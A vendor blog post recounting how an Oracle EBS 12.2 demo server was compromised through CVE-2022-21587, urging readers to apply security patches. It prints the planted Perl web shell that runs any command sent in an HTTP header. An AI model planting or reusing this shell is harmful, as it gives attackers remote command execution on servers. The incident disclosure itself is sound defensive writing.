Is your EBS 12.2 protected from attacks through HTTP?

February 9, 2023 CPU CVE ebs 12.2 security vulnerability

Recently we recognized that Blitz Report EBS 12.2.12 Demo instance does not work as expected. No concurrent request log or output file could be opened. Instead a blank page was displayed with a URL that looked like:

https://demo.enginatics.com:4443/OA_CGI/FNDWRR.exe?temp_id=1001054024

I spent some time identifying the root cause of the issue. Finally I found that the following file was tampered on the run filesystem:

/u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/common/scripts/txkFNDWRR.pl

It contained the following code:

use CGI;
print CGI::header( -type =&gt; 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;

That led me to the following article which contained exactly the same code.

Turned out that someone hacked our EBS using Oracle Web Applications Desktop Integrator CVE-2022-21587 vulnerability. Anyone with the EBS login page available on the Internet is under risk. Recently one of our customers faced the same problem. The fix for that issue is to apply the latest EBS CPU patches.

This example shows one more time the importance of applying the security patches regularly as sometimes it is hard to predict where is the weak point in your system.

Author: Alexander Pavlik

Popular Posts

How to track master data changes using Oracle EBS Audit function and Blitz Report™ 122368

Oracle Enterprise Command Center Framework Release 12.2 installation and integration with Oracle EBS 12.2.8 17522

Oracle Discoverer replacement – importing worksheets into Blitz Report™ 13206

Oracle Discoverer 11.1.1.7 installation and integration with Oracle EBS R12.1.3 12759

How to check if a patch is applied in Oracle EBS 12.2 12531

Oracle E-Business Suite 12.2.8 upgrade to version 12.2.9 11129

Oracle E-Business Suite 12.2.7 upgrade to version 12.2.8 9049

Migration to Java Web Start in Oracle EBS 12.2 instance 8594

Securing sensitive data with Oracle VPD 6392

EBS 12.1.3 BI Publisher Excel templates generate XLS instead of XLSX and limit row number to 65,536 5384

Blog Archive

2024

January (1)

Oracle EBS with self-signed TLS certificate returning ERR_CERT_COMMON_NAME_INVALID in Chrome on Windows 124

2023

December (2)

September (1)

Signing EBS Jar Files With HSM (Hardware Security Module) 598

August (1)

Configuring TLS/HTTPS for Oracle EBS Integrated SOA Gateway (ISG) in 12.1 286

July (3)

April (2)

February (2)

2022

December (2)

January (1)

Launching EBS forms with Java Web Start on MacOS Big Sur and later 1785

2021

December (2)

November (1)

Updated DBA AWR Blitz Reports now work with pluggable databases 2366

October (1)

Find an IP address and geolocation of EBS clients’ logins 1233

May (1)

New Release – Blitz Report 3.1.8 1343

April (1)

Oracle Enterprise Command Center Framework upgrade to V6 2248

January (2)

2020

December (2)

October (4)

September (2)

August (1)

Oracle Discoverer replacement – importing worksheets into Blitz Report™ 13206

July (8)

June (3)

April (8)

March (7)

2019

October (1)

Oracle Enterprise Command Center Framework upgrade to V3 3445

August (2)

June (2)

May (1)

Securing sensitive data with Oracle VPD 6392

March (1)

Oracle Discoverer 11.1.1.7 installation and integration with Oracle EBS R12.1.3 12759

2018

November (2)

May (1)

Vegas, Baby! – Enginatics is showcasing Blitz Report at Collaborate 18 2138

January (1)

Conference Planning 2018 2306

2017

November (1)

DOAG 2017 – German Oracle User Group Conference in Nuremberg 2520

September (1)

Case Study – The MYTOYS GROUP chooses Blitz Report™ 1854

Recent Events

2024

April (5)

June (3)

May (2)

September (1)

CloudWorld 2024

March (2)

February (1)

CloudWorld Tour – Mumbai

January (1)

CloudWorld Tour – Dubai

2023

October (7)

November (7)

September (1)

Oracle Cloud World 2023

May (1)

Blitz Report – reporting and mass data upload tool for Oracle EBS

April (2)

June (3)

February (2)

2022

November (2)

December (2)

October (2)

June (4)

May (3)

April (1)

OUG Scotland

September (1)

OUG Ireland

March (2)

February (3)

2021

December (2)

November (4)

October (10)

September (5)

August (7)

June (5)

May (5)

April (5)

March (3)

February (1)

Webinar: What’s new with the world’s fastest Oracle EBS reporting

January (2)

2020

December (4)

November (3)

October (8)

September (2)

August (2)

July (4)

June (5)

May (9)

April (1)

OATUG Forum Online – Interactive Workshop- EBS to Excel for Non Developers

February (2)

January (1)

Oracle OpenWorld Middle East, Dubai

2019

October (13)

September (3)

November (4)

August (4)

June (5)

May (5)

April (7)

March (4)

January (3)

February (6)

2018

November (4)

December (1)

UKOUG Apps18, Liverpool

October (1)

Oracle Open World, San Francisco

September (3)

June (2)

May (1)

GLOC, Cleveland

Find out more

Features

Discover how Blitz Report™ simplifies report creation out of the Oracle E-Business Suite.

Download

Blitz Report™ is completely free
up to 30 different reports

FAQ

What is Blitz Report™?
Why do I need Blitz Report™?

By continuing to use the site, I accept the use of cookies. Accept